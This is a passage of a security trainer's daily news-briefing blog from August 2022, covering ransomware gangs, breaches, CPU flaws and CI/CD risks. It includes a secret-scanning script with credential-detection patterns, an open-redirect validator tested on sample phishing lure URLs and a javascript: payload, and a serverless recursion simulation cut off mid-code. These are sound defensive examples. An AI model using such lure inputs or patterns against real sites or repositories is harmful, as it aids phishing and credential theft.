Chen, Sophia, Should We Build Quantum Computers at All?, American Physical Society News, 8 August 2022. Available online at https://www.aps.org/publications/apsnews/202209/build-quantum.cfm.

Ransomware Gang More Trouble Than Ever

The remnants of the Conti ransomware gang have continued to cause more trouble for enterprises all over the world. Several groups have spun off and are operating independently, using the BazarCall tactic pioneered by Conti to gain access to victims' networks.

BazarCall, also known as call-back phishing, starts with an email telling the recipient that a subscription is about to renew, but the payment can be cancelled by calling a particular number. The number is answered by a social engineer, who convinces the caller to start a remote access session, which will be used by a network intruder to scout the network defences and deploy tools which will not be detected.

At least three groups - called Silent Ransom Group, Quantum and Roy/Zeon - are using this technique, which allows them to defeat sophisticated automated defences.

So damaging have these attacks become that the US State Department is offering a $US10 million reward for information on five of the ransomware gang members. Posting a photo of the hacker known as 'Target', the State Department is asking for information about him and four other members known as 'Tramp', 'Dandis', 'Professor' and 'Reshaev' - the information to be provided via a Tor anonymizing network link.

The success of the BazarCall technique's social engineering carries a message: we cannot pin all our hopes on technical controls; when the human becomes the weakest link, we must ramp up our efforts in security education, training and awareness.

Abrams, Lawrence, US govt will pay you $10 million for info on Conti ransomware members, Bleeping Computer, 11 August 2022. Available online at https://www.bleepingcomputer.com/news/security/us-govt-will-pay-you-10-million-for-info-on-conti-ransomware-members/.

Ilascu, Ionut, Conti extortion gangs behind surge of BazarCall phishing attacks, Bleeping Computer, 10 August 2022. Available online at https://www.bleepingcomputer.com/news/security/conti-extortion-gangs-behind-surge-of-bazarcall-phishing-attacks/.

HTTP Request Smuggling Attacks

In a paper released via a Black Hat talk today, PortSwigger Director of Research James Kettle has expanded his previous work on attacks against web servers to show how the same techniques can be used to exploit vulnerabilities in the HTTP/2 request handling of browsers.

The techniques utilized are somewhat too involved to detail here, and rely on interactions between the HTTP/1.1 and /2 and TCP protocols, along with the behaviour of reverse proxies and web content accelerators. For those interested, there's lots of good reading in the references below, while for everyone else, expect updates to popular web server software and browsers as the Bad Guys enjoy reading the same references and develop related exploits.

Kettle, James, Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling, white paper, 10 August 2022. Available online at https://portswigger.net/research/browser-powered-desync-attacks.

Vijayan, Jai, New HTTP Request Smuggling Attacks Target Web Browser, Dark Reading, 11 August 2022. Available online at https://www.darkreading.com/application-security/researcher-at-black-hat-describes-new-htpp-request-smuggling-attack.

Open Source Threat Intelligence - Not As Open As You'd Think

An article by three security researchers from Samsung Research in IEEE Security & Privacy points out that we should be wary of licensing conditions on open-source threat intelligence feeds. In many cases, the information is provided for personal, informational and research purposes only, and in some cases, the site or feed has no licence information or terms of service at all - in which case, no-one can use, copy, modify or distribute the information. In other cases, the meaning of terms like commercial use is unclear, making use risky.

Shim, WooChul, Hyejin Shin and Yong Ho Hwang, On Data Licenses for Open Source Threat Intelligence, IEEE Security & Privacy, Vol 20 No. 4, July/August 2022, pp. 8 - 22. Digital Object Identifier 10.1109/MSEC.2021.3127218.




[ Modified: Friday, August 12, 2022, 7:46 PM ]
 
by Les Bell - Thursday, August 11, 2022, 9:38 AM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Cisco Corporate Network Breached by Ransomware Gang

The group, called Yanluowang, managed to exfiltrate some files from one employee's Box folder, and then attempted to extort the networking company. However, it took some work for them to get this far - the attackers had to use a whole series of voice phishing attacks and forged multi-factor authentication push notifications to finally trick a victim into handing over the credentials for his Google account.

From there, though, the gang were able to get VPN access into the company and pivot to domain controllers and Citrix servers, where they exfiltrated more data and installed their tools in an attempt to persist. Despite being evicted, the attackers kept trying to return - Cisco claims, unsuccessfully. No ransomware was installed, but the threat actor's behaviour suggests that would have been one of their next steps if not discovered.

Biasini, Nick, Cisco Talos shares insights related to recent cyber attack on Cisco, Cisco Talos, 10 August 2022. Available online at https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html.

Gatlan, Sergiu, Cisco Hacked by Yanluowang ransomware gang, 2.8 GB allegedly stolen, Bleeping Computer, 10 August 2022. Available online at https://www.bleepingcomputer.com/news/security/cisco-hacked-by-yanluowang-ransomware-gang-28gb-allegedly-stolen/.

5G IoT APIs a Disaster Waiting to Happen

One of the benefits of 5G is to move IoT devices off domestic and SME wi-fi networks, where they have to punch holes through NATting routers, onto a high-bandwidth, but - more importantly - low-latency cellular network which will allow direct management. In a presentation at Black Hat, Technical University of Berlin researcher Altaf Shaik says that the IoT APIs of 10 mobile carriers he examined share common, but serious, vulnerabilities which could allow unauthorised access to data or even direct access to devices on the 5G network.

The 5G standards do not define IoT service platforms, and so a plethora of new protocols have sprung up, many designed by telcos with limited experience in this area. The results include weak authentication and a lack of access controls which can reveal customer data, access to data streams or even direct access to devices via simple replay attacks.

Newman, Lily May, One of 5G's Biggest Features Is a Security Minefield, Wired, 9 August 2022. Available online at https://www.wired.com/story/5g-api-flaws/.

Threat Actors Shift Left

The automation and orchestration of the development and deployment process - generally labeled CI/CD (Continuous Integration / Continuous Deployment) - has introduced vulnerabilities which attackers are now exploiting, according to two speakers at Black Hat. In their talk, RCE-as-a-Service: Lessons Learned from 5 Years of Real-World CI/CD Pipeline Compromise, Iain Smart and Viktor Gazdag provide examples of common vulnerabilities in these pipelines:

  • Hardcoded credentials in version control systems and source control management
  • Over-permissive roles
  • Lack of audit, monitoring and alerting

Traditional, on-prem, software development practices were largely secure by virtue of being well inside the enterprise network. Now that source is in shared, cloud-hosted, repositories, along with all the test scripts, manifests and deployment tools that push them into production, they need a lot more attention from security professionals. Even for on-prem deployment, the COVID-19-inspired shift to hybrid work means that developers are often working with cloud-hosted tools. In short, DevOps must become DevSecOps or even SecDevOps.
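One concrete control for the first item in that list is a pre-commit scan of staged files for credential material. The following is an added example in Python, not code from the talk or the article: the AWS access-key-ID format and the PEM header it matches are real, while the "generic assignment" rule, the entropy floor, the template prefixes and the sample config are heuristics and constructed data assumed here.

```python
"""Pre-commit secret scan for hardcoded credentials in source control.

Added example. The AWS key-ID format and PEM header are real; the generic
rule, entropy floor and template prefixes are heuristics (assumptions).
"""
import math
import re
import subprocess
import sys
from dataclasses import dataclass

PATTERNS = {
    # AWS access key IDs are 20 characters and start with AKIA.
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    # PEM-armoured private key of the common kinds.
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    # key = "value" assignments whose key name suggests a secret (heuristic).
    "generic_assignment": re.compile(
        r'(?i)(?:password|passwd|secret|api[_-]?key|token)\s*[:=]\s*["\']([^"\'\s]{8,})["\']'
    ),
}
ENTROPY_FLOOR = 3.0  # bits per character; below this the value is probably a placeholder
TEMPLATE_PREFIXES = ("${", "$(", "{{", "<")  # values injected at deploy time, not secrets


@dataclass(frozen=True)
class Finding:
    path: str
    line_no: int
    rule: str
    snippet: str


def shannon_entropy(s: str) -> float:
    """Bits per character; a random token scores well above a dictionary word."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def looks_like_placeholder(value: str) -> bool:
    """Templated references and low-entropy strings are not treated as secrets."""
    return value.startswith(TEMPLATE_PREFIXES) or shannon_entropy(value) < ENTROPY_FLOOR


def scan_text(path: str, text: str) -> list:
    """Return one Finding per (line, rule) hit; placeholders are filtered out."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for rule, rx in PATTERNS.items():
            m = rx.search(line)
            if not m:
                continue
            if rule == "generic_assignment" and looks_like_placeholder(m.group(1)):
                continue
            findings.append(Finding(path, line_no, rule, line.strip()[:80]))
    return findings


def staged_files() -> list:
    """Paths staged for the current commit (added, copied or modified only)."""
    out = subprocess.run(
        ["git", "diff", "--cached", "--name-only", "--diff-filter=ACM"],
        capture_output=True, text=True, check=True,
    ).stdout
    return [p for p in out.splitlines() if p]


def scan_staged() -> list:
    """Scan every staged file; a file removed since staging is simply skipped."""
    findings = []
    for path in staged_files():
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings.extend(scan_text(path, fh.read()))
        except OSError:
            continue
    return findings


# Constructed sample: a config file that should never have been committed.
SAMPLE_CONFIG = """\
# constructed sample, not a real configuration
[default]
aws_access_key_id = "AKIAIOSFODNN7EXAMPLE"
db_password = "${DB_PASSWORD}"
admin_password = "changeme"
api_token = "p4$sw0rd-Xk9#Qm2vLt"
ssh_key = "-----BEGIN OPENSSH PRIVATE KEY-----"
"""

if __name__ == "__main__":
    # With --staged this acts as a pre-commit hook: non-zero exit blocks the commit.
    use_staged = len(sys.argv) > 1 and sys.argv[1] == "--staged"
    hits = scan_staged() if use_staged else scan_text("sample.ini", SAMPLE_CONFIG)
    for f in hits:
        print(f"{f.path}:{f.line_no}: {f.rule}: {f.snippet}")
    sys.exit(1 if hits else 0)
```

Run without arguments it scans the embedded sample and reports three hits (the AWS key ID, the high-entropy token and the private key header) while ignoring the templated and placeholder passwords.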

Seals, Tara, Software Development Pipelines Offer Cybercriminals 'Free-Range' Access to Cloud, On-Prem, Dark Reading, 10 August 2022. Available online at https://www.darkreading.com/application-security/software-development-pipelines-cybercriminals-free-range-access-cloud-on-prem.

Amazon Expands Biometric Payments

Retail giant Amazon is expanding the use of its Amazon One palm print scanning checkout system to 65 Whole Foods stores across California. The system is contactless, reducing the risks of infection; the user can simply hold their hand, palm down, above the scanner. The scheme has, perhaps inevitably, drawn the ire of privacy advocates - which Amazon has countered by simply offering customers a $10 credit to register for the system.

Axon, Samuel, Amazon begins large-scale rollout of palm print-based payments, Ars Technica, 11 August 2022. Available online at https://arstechnica.com/gadgets/2022/08/amazon-begins-large-scale-rollout-of-palm-print-based-payments/.

Multiple VMware Vulnerabilities

In an advisory, VMware warns of multiple vulnerabilities which will allow privilege escalation, information disclosure and authentication bypass.

Uncredited, Advisory VMSA-2022-0022, 9 August 2022. Available online at https://www.vmware.com/security/advisories/VMSA-2022-0022.html.

CISA Vulnerability Summary

The US Cybersecurity & Infrastructure Security Agency has released its weekly vulnerability summary for the first week of August. Well worth a look, albeit depressing - it really has something for everyone.

CISA, Vulnerability Summary for the Week of August 1, 2022. Available online at https://www.cisa.gov/uscert/ncas/bulletins/sb22-220.

COVID Contact App Finally Scrapped

After over two years, $A21 million and yet only two cases identified, the Australian government has finally canned its much-reviled COVIDSafe contact-tracing app. Many experts - your humble scribe included - warned that the app was an incredibly bad idea, largely due to the vagaries of Bluetooth antenna patterns, the likelihood of false positives from people passing on the other side of walls and windows, power consumption, the inverse square law and many other problems, but a previous government minister with little understanding of, and far too much faith in, technology pressed ahead regardless. As the old saying has it, if you think technology will solve your problem, then you don't understand technology and you don't understand your problem.

No-one will mourn its passing; First Dog on the Moon perhaps said it best:


Black, Jessica, The COVIDSafe app is dead - but was it ever really alive?, ABC News, 10 August 2022. Available online at https://www.abc.net.au/news/2022-08-10/covidsafe-app-scrapped-what-went-wrong/101317746.



[ Modified: Thursday, August 11, 2022, 9:39 AM ]
 
by Les Bell - Wednesday, August 10, 2022, 10:21 AM

News Stories

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

Intel APIC Vulnerability Breaks Crypto

A couple of security students from Rome and Graz, Austria, have discovered a vulnerability in Intel's SGX security architecture which will leak information via uninitialized memory reads - a variation on the classic Time of Check/Time of Use class of vulnerabilities.

The SGX architecture is intended to protect sensitive data such as encryption keys in memory by the creation of secure memory blocks called enclaves. The proof-of-concept exploit uses a vulnerability in the Advanced Programmable Interrupt Controller to access stale data in registers and thereby break SGX, obtaining a 128-bit AES key in 1.35 seconds with a 94% success rate. It can also extract a 1024-bit RSA key (but who uses those?) in an average of 81 seconds with a 74% success rate.

The lesson here? The complexity of modern CPUs is making it impossible to make guarantees about security. For some years, the use of formal methods in hardware design had made this possible, but for the last 5 years or so, we have seen the growth of CPU vulnerabilities like Spectre, Meltdown and others which created side-channel attacks, and now ÆPIC. As we have long known, the enemy of security is complexity.

Goodin, Dan, SGX, Intel's supposedly impregnable data fortress, has been breached yet again, Ars Technica, 10 August 2022. Available online at https://arstechnica.com/information-technology/2022/08/architectural-bug-in-some-intel-cpus-is-more-bad-news-for-sgx-users/.

Windows 11 Crypto Bug Corrupts Data

A newly-discovered bug in Windows 11 affects systems using AES-XTS and AES-GCM encryption modes on Intel Ice Lake, Tiger Lake, Rocket Lake and Alder Lake processors. Let's break this down.

AES-XTS is XEX-based tweaked-codebook mode with ciphertext stealing (I won't delve further into this, but it's something I cover in a forthcoming course on crypto for developers), and is primarily used for encrypted filesystems such as BitLocker, VeraCrypt, etc. AES-GCM is much more common - it's the Galois/Counter Mode used by the majority of TLS connections on the web.

The processor architectures listed cover some of Intel's 10th-generation laptop processors, as well as all their 11th- and 12th-generation Core CPUs. AMD's as-yet-unreleased Zen 4 processors will also support the VAES (Vector AES) instructions which underlie the problem.

Microsoft introduced a patch for the problem in the June 2022 security update package for Windows 11 and Windows Server 2022. If you have deployed this patch, you will not be hit with the data corruption problem - but systems running before this may have as-yet-undetected corrupted data - most likely in encrypted filesystems. Clearly, the fix should be applied ASAP. The first version of the patch caused performance degradation, probably because it disabled hardware crypto acceleration. The July 2022 version should remedy this, however.

Unattributed, KB5017259 - Windows devices that have the newest supported processors might be susceptible to data damage, Microsoft Windows support, August 2022. Available online at https://support.microsoft.com/en-us/topic/kb5017259-windows-devices-that-have-the-newest-supported-processors-might-be-susceptible-to-data-damage-d5e7c0cb-6e0a-4865-81ed-c82e91657a24.

Cisco Small Business Routers - Update Urgently

Cisco has disclosed multiple vulnerabilities in their Small Business RV160, RV260, RV340 and RV345 series routers, which can allow remote code execution (RCE) by an unauthenticated remote attacker, or simply trigger a denial of service. There are no workarounds - the only fix is a software update.

You know what to do.

Uncredited, Cisco Small Business RV Series Routers Vulnerabilities, Cisco Security Advisory, 3 August 2022. Available online at https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR.

A New Form of Steganography

The classic approach to steganography was the use of milk, urine and other substances as an invisible ink which would reveal a message when heated over a candle. Now, scientists at the University of Texas at Austin have put a twist on this by storing a 256-bit encryption key in a polymer material made up of sequence-defined polymers - basically long chains of polymers, each of which corresponds to one of 16 different symbols, which they then incorporated into a special ink.

Ouellette, Jennifer, Scientists hid encryption key for Wizard of Oz text in plastic molecules, Ars Technica, 9 August 2022. Available online at https://arstechnica.com/science/2022/08/scientists-encoded-the-wizard-of-oz-in-the-chemical-structure-of-ink/.

Customer Engagement Firm Twilio Breached

Twilio, which provides mass marketing, email and customer communications services, had several employees fall victim to a smishing attack, which gained an as-yet-unidentified threat actor access to some of the company's internal systems. The SMS messages looked credible, taking employees to what looked like Twilio's SSO sign-in page hosted at fake domains.

This illustrates a weakness in using federated identity management systems hosted by external providers - they take the employee out of the company domain to one they don't really take notice of, in order to sign in. The best additional layer of defence is multi-factor authentication - and a text-message-based mTAN is emphatically not the right approach here!

Uncredited, Incident Report: Employee and Customer Account Compromise - August 4, 2022, Twilio Security Blog, 7 August 2022. Available online at https://www.twilio.com/blog/august-2022-social-engineering-attack.

Nice Doggy - Now Roll Over

A few weeks ago, a video of a robot dog firing a machine gun went viral:

If this has been giving you sleepless nights, take comfort from the fact that the robot killer canine is just as vulnerable as your garage door opener - a kill signal sent over a 433 MHz channel will instantly disable the dog. You can use any of many devices, such as a Flipper Zero, to send the signal; if you aren't familiar with these, ask your friendly local car thief.

Gault, Matthew, Hacker Finds Kill Switch for Submachine Gun-Wielding Robot Dog, Vice, 8 August 2022. Available online at https://www.vice.com/en/article/akeexk/hacker-finds-kill-switch-for-submachine-gun-wielding-robot-dog.



[ Modified: Thursday, August 11, 2022, 4:21 PM ]
 
by Les Bell - Tuesday, August 9, 2022, 9:58 AM

News Stories

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

Targeted Ransomware Attacks on South Korea

South Korean manufacturing, pharmaceutical and healthcare companies are being targeted by Linux and Windows ransomware which will lock up files including VMware ESXi virtual machines. The GwisinLocker ransomware is produced by an otherwise-unidentified threat actor with a good knowledge of South Korean business - the attacks occurred on Korean public holidays and in the early hours of the morning. "Gwisin" means "ghost" in Korean.

The ransom note text files left behind include a lot of very specific information, including the victim company name and the types of data stolen, indicating a highly targeted attack.

Toulas, Bill, New GwisinLocker ransomware encrypts Windows and Linux ESXi servers, Bleeping Computer, 6 August 2022. Available online at https://www.bleepingcomputer.com/news/security/new-gwisinlocker-ransomware-encrypts-windows-and-linux-esxi-servers/.

Cheat Sheet Maps MITRE ATT&CK to Google Cloud Platform

MSSP Expel is offering a mind map cheat sheet which maps the MITRE ATT&CK framework to the services and API calls a threat actor would use at each stage of an attack in Google Cloud Platform. The 18-page map is useful to SOC analysts for incident response triage and investigations as well as to security architects designing instrumentation for SOAR.

It wouldn't be too difficult to re-map this approach to other cloud platforms like AWS and Azure. It's not a playbook, but a very useful adjunct.

Pellett, Kyle, A defender's MITRE ATT&CK cheat sheet for Google Cloud Platform (GCP), Expel Inc, 5 August 2022. Available online at https://expel.com/blog/mitre-attack-cheat-sheet-for-gcp/ (registration required for download).

Fixing Open Source Vulnerabilities At Scale

The fact that thousands of open source projects firstly, are open source and secondly, are hosted on public repositories like GitHub makes it possible to use search tools like GitHub's code query language, CodeQL, to find common vulnerabilities across many projects and automate their reporting and fixing. Jonathan Leitschuh, inaugural Dan Kaminsky Fellow at HUMAN Security, has used his fellowship year to work on refining tools and methods for this process, and will be delivering a presentation on it at Black Hat in Las Vegas this week.

Given that open source components permeate not just the open source culture but also vast swathes of the proprietary code ecosystem, vulnerabilities in them can be devastating, as we have seen with the notorious Log4J vulnerability. This research could well have a massive payoff.

Chickowski, Ericka, We Have the Tech to Scale Up Open Source Vulnerability Fixes - Now It's Time to Leverage It, Dark Reading, 9 August 2022. Available online at https://www.darkreading.com/dr-tech/we-have-the-tech-to-scale-up-open-source-vulnerability-fixes-now-it-s-time-to-leverage-it.

Insurer Found Not Liable for Ransomware Remediation

The Federal Court of Australia has delivered a judgement in favour of the insurer in Inchcape Australia Limited v Chubb Insurance Australia Limited [2022] FCA 883. Inchcape had suffered a ransomware attack which had encrypted its primary server, deleted the primary and offsite (!?!) backups, spread to client machines and exfiltrated data, and had claimed for the costs of incident response and forensic investigations, the costs of replacing hardware, data recovery and the additional manpower requirements.

Their policy with Chubb had three separate agreements, covering (1) computer systems fraud in general, (2) direct financial loss from computer viruses and similar programs, and (3) direct financial loss resulting from the fraudulent modification of electronic data, electronic media or electronic instruction.

The case primarily hinged on whether the expression "direct financial loss resulting directly from" in the latter two agreements would include the incident response costs, hardware replacement, etc. or be limited to just the cost of actually reproducing the lost data, etc.

I have simplified this substantially - Justice Jagot's judgement lays out the questions in much greater detail. The reasoning is very restricted to the specific policy and circumstances, but is a useful reminder to have your corporate counsel review the fine print of your insurance policies. In particular, be aware that cyber insurance policies are designed to provide specific incident response expertise and cover those costs - what Inchcape had was a more general - but tightly worded - policy to cover the costs of data recovery only.

Inchcape Australia Limited v Chubb Insurance Australia Limited [2022] FCA 883, Federal Court of Australia, 1 August 2022. Available online at https://www.austlii.edu.au/cgi-bin/viewdoc/au/cases/cth/FCA/2022/883.html.

Danish 7-Eleven Stores Closed Due to POS Attack

7-Eleven stores throughout Denmark were closed on Monday, due to an early-morning cyber attack on their checkout and point-of-sale systems.

There's a business continuity planning challenge here: keeping an old-fashioned cash register on hand is not going to be any use; since COVID-19 struck, almost everyone uses cashless, contactless, payment these days - in fact, credit cards are less used than smartphone payment systems.

Abrams, Lawrence, 7-Eleven stores in Denmark closed due to a cyberattack, Bleeping Computer, 8 August 2022. Available online at https://www.bleepingcomputer.com/news/security/7-eleven-stores-in-denmark-closed-due-to-a-cyberattack/.

Incident Response Delay Comes Back to Bite Experian

Credit reference company Experian suffered a major breach in July, due to really bad design of its account recovery processes. It appears that customers could regain access to locked accounts by simply recreating them on a different email address, using their name, address, phone number, social security number and answering a few questions based on publicly-available information.

Experian's real problem was that a couple of customers contacted security blogger Brian Krebs, who set out to replicate their experience and investigate further, publishing his findings. At this point, a major vulnerability was public knowledge, but rather than moving rapidly to fix it, Experian downplayed the problem and claimed that additional controls would prevent account hijacking. Unfortunately, this was incorrect, and a number of people had their accounts hijacked.

Experian is now facing a class action for their failure to fix this issue, with the filing quoting liberally from the KrebsOnSecurity article. It is doubtful if much will result from this, but it does illustrate the need to move quickly to really address vulnerability disclosure, rather than relying on crisis communications to manage public sentiment.

Krebs, Brian, Class Action Targets Experian Over Account Security, KrebsOnSecurity, 5 August 2022. Available online at https://krebsonsecurity.com/2022/08/class-action-targets-experian-over-account-security/.

Amazon to Acquire iRobot - Here's Why

Last week, retail giant Amazon announced a deal to acquire iRobot Corp., maker of the best home appliance ever, the Roomba (as well as various mopping, gutter-cleaning and other gizmos). Although Amazon does use Roomba-like gadgets in its warehouses (as does IBM, for temperature monitoring in the aisles of its data centres), and iRobot is a profitable business with plenty of growth potential, these are perhaps not the real motivation for the acquisition.

It's about mapping the inside of your home. Amazon has big designs on being a smart-home company; its Echo smart speakers outsell their rivals, in part due to low pricing which Amazon will recoup through the devices' ability to order products directly from the company with minimal user effort. These smart speakers anchor a smart home ecosystem that can interact with lighting, security cameras, thermostats and much more. The company also sells tablets and streaming services, and has acquired grocery retailer Whole Foods, doorbell manufacturer Ring and wi-fi router maker Eero.

But until now, Amazon hasn't known exactly where in the home these gadgets sit. Mapping data from a Roomba meandering from room to room will tell the company the size of your home, the layout of the rooms, the placement of the furniture, and much more. It's going to be interesting to see how privacy advocates and legislators respond to this.

Webb, Alex, Amazon's Roomba Deal Is Really About Mapping Your Home, Bloomberg, 6 August 2022. Available online at https://www.bloomberg.com/news/articles/2022-08-05/amazon-s-irobot-deal-is-about-roomba-s-data-collection.


These news brief blog articles are collected at https://www.lesbell.com.au/classroom/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/classroom/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

[ Modified: Tuesday, August 9, 2022, 10:16 AM ]
 
by Les Bell - Sunday, August 7, 2022, 12:20 PM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Local Privilege Escalation Vuln in Kaspersky VPN Client

A vulnerability in Kaspersky's VPN Secure Connection for Microsoft Windows allows a local, already-authenticated user to escalate to SYSTEM privilege on the victim's computer. While no exploits for CVE-2022-27535 have been seen in the wild, a local privilege escalation is exactly what a phishing payload or a malicious insider needs after a foothold, so customers should update to version 21.6 or later.

Seals, Tara, High-Severity Bug in Kaspersky VPN Client Opens Door to PC Takeover, Dark Reading, 5 August 2022. Available online at https://www.darkreading.com/endpoint/high-severity-bug-kaspersky-vpn-client-pc-takeover.

Phishers Exploit Unvalidated Redirects on Amex and Snapchat Sites

The problem of unvalidated redirects and forwards in web server code has been known about since - well, since soon after CGI code first ran on web servers. Yet it continues to catch out many developers and their sites' users, most recently in a campaign which was active for over two and a half months and targeted American Express - who fixed the problem - and Snapchat, which remained vulnerable at the time of writing. The attraction for the phisher is that the lure link visibly points at a trusted domain, so reputation-based filters and wary users are more likely to let it through, while the redirect quietly delivers the victim to the credential-harvesting page. Similar attacks have previously targeted FedEx and Microsoft.
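As an added example (not code from the INKY article or from either affected site), here is the vulnerable pattern beside a validator that only permits same-site paths or allowlisted hosts, normalising the input the way browsers do before deciding. The allowlist, the lure inputs and the function names are assumptions made for the example.

```python
from urllib.parse import urlsplit

# Constructed allowlist of hosts this application may redirect to.
ALLOWED_HOSTS = {"www.example.com", "login.example.com"}

def redirect_target_vulnerable(next_param: str) -> str:
    """The classic bug: wherever ?next= points, that is where the user goes.
    A lure such as https://www.example.com/login?next=https://evil.example
    therefore carries the trusted domain in the visible link."""
    return next_param

def redirect_target_safe(next_param: str, fallback: str = "/") -> str:
    """Return next_param only if it resolves to an allowlisted host or a
    same-site absolute path; otherwise return a safe fallback."""
    if not next_param:
        return fallback
    # Browsers strip tab/CR/LF from URLs and treat '\' like '/' in http(s)
    # URLs; normalise the same way so we judge what the browser will see.
    candidate = "".join(ch for ch in next_param if ch not in "\t\r\n").strip()
    candidate = candidate.replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return fallback                     # javascript:, data:, ftp: ...
    if parts.netloc:
        # Absolute or protocol-relative URL: hostname strips userinfo and
        # port, so 'https://www.example.com@evil.example' is judged by 'evil.example'.
        host = (parts.hostname or "").lower()
        return candidate if host in ALLOWED_HOSTS else fallback
    # No authority parsed. Browsers still treat '///host' as an authority
    # (extra slashes are ignored), so anything beginning '//' is off-site.
    if candidate.startswith("//") or not candidate.startswith("/"):
        return fallback
    return candidate

# Constructed lure inputs a phisher might place in ?next=
CASES = [
    "/account",
    "https://www.example.com/account",
    "//www.example.com/account",
    "https://evil.example/",
    "//evil.example",
    "///evil.example",
    "/\\evil.example",
    "/\t/evil.example",
    "https://www.example.com@evil.example/",
    "https://www.example.com.evil.example/",
    "javascript:alert(1)",
]

def check_all() -> dict:
    """Map each constructed input to where the safe validator would send the user."""
    return {c: redirect_target_safe(c) for c in CASES}

if __name__ == "__main__":
    for src, dst in check_all().items():
        print(f"{src!r:45} -> {dst}")
```

The validator is deliberately conservative: it rejects anything it cannot prove is on-site rather than trying to enumerate every encoding trick. If your framework decodes the query string, run the check on the decoded value it will actually pass to the redirect, and log rejected values, since each one is a phishing indicator worth correlating with mail-gateway data.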

Kay, Roger, Phishers Bounce Lures Off Unprotected Snapchat, Amex Sites, INKY Email Security Blog, 3 August 2022. Available online at https://www.inky.com/en/blog/phishers-bounce-lures-off-unprotected-snapchat-amex-sites.

5.4 Million Twitter Accounts Compromised

Not the highest-impact social media breach by a long shot, but Twitter has confirmed that a threat actor used a zero-day exploit to gather the profiles of 5.4 million Twitter users, including verified phone numbers and email addresses, screen names, login names, location and other information. The hacker subsequently sold this data dump to two different interested parties.

While much of this information was public anyway, it may have exposed the personal information of users who held pseudonymous accounts for privacy reasons, since the flaw linked a phone number or email address to the account that used it. It also seems likely that the information could be used by the purchasers to run highly-targeted spear-phishing attacks. Twitter recommends that users who may be affected - or suspect they may be affected - should enable multi-factor authentication on their accounts; that helps against credential attacks, but does nothing to restore the privacy of an account that has already been de-pseudonymised.

Abrams, Lawrence, Twitter confirms zero-day used to expose data of 5.4 million accounts, Bleeping Computer, 5 August 2022. Available online at https://www.bleepingcomputer.com/news/security/twitter-confirms-zero-day-used-to-expose-data-of-54-million-accounts/.

Cloud Billing Risk: Recursive Serverless Functions

I'm almost certain you never foresaw this particular risk: the possibility that a recursive function, running on a serverless cloud platform, could rapidly consume massive amounts of resources before any budget alert could fire to warn you of what's happening. Cloud developers are reporting horror stories on all the major cloud platforms - AWS, Azure and Google Cloud Platform - with one developer burning through $US72,000 in a few hours while exploring and testing. The usual shape of the accident is a function whose output lands back in the storage bucket or queue that triggers it, so every invocation schedules one or more further invocations.

OK, this isn't strictly security, but it's a big risk and probably worth passing on to your development teams. It's one thing to screw up and max out CPU and memory on your own development workstation - it's quite another to do it on a pay-as-you-go platform that can automagically scale up to consume an entire cloud. Note, too, that the same loop can be set off deliberately by anyone who can drop an object into the triggering bucket, at which point it is a denial-of-service attack on your budget.
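The following is an added example, not code from the InfoQ article or any cloud provider's SDK. It simulates a storage-triggered function offline: every object the handler writes becomes a new event, and three handler variants show the runaway case, a hop-count backstop, and the combination of backstop plus recognising the function's own output. The hop limit, fan-out, budget figure and event format are assumptions chosen for illustration.

```python
from collections import deque

MAX_HOPS = 8             # assumed deepest legitimate chain of triggered invocations
FANOUT = 2               # objects written per invocation; >1 makes growth exponential
SIMULATED_BUDGET = 1000  # stands in for the point at which a billing alert finally fires

class RecursionGuardTripped(Exception):
    """Raised when an event has already passed through too many invocations."""

def handler_unguarded(event, put_object):
    """Writes its results into the same bucket whose uploads trigger it."""
    for i in range(FANOUT):
        put_object({"key": f"{event['key']}/out{i}", "meta": {}})

def handler_hop_limited(event, put_object):
    """Carries a hop counter in object metadata and refuses to go deeper than
    MAX_HOPS. Bounds the damage, but with fan-out still permits
    FANOUT**MAX_HOPS invocations before the guard trips."""
    hops = int(event["meta"].get("x-hops", 0))
    if hops >= MAX_HOPS:
        raise RecursionGuardTripped(event["key"])
    for i in range(FANOUT):
        put_object({"key": f"{event['key']}/out{i}", "meta": {"x-hops": hops + 1}})

def handler_guarded(event, put_object):
    """Hop limit as a backstop, plus the real fix: recognise its own output
    (here by a key suffix; a separate output prefix or bucket is better)
    and return without writing anything further."""
    hops = int(event["meta"].get("x-hops", 0))
    if hops >= MAX_HOPS:
        raise RecursionGuardTripped(event["key"])
    if event["key"].endswith(".done"):
        return                                   # idempotent: already processed
    for i in range(FANOUT):
        put_object({"key": f"{event['key']}/out{i}.done", "meta": {"x-hops": hops + 1}})

def simulate(handler, budget=SIMULATED_BUDGET):
    """Run one handler against a simulated bucket trigger, breadth-first.
    Returns (invocations consumed, how the run ended)."""
    queue = deque([{"key": "upload.jpg", "meta": {}}])   # constructed seed event
    invocations = 0
    while queue:
        if invocations >= budget:
            return invocations, "budget exhausted"
        event = queue.popleft()
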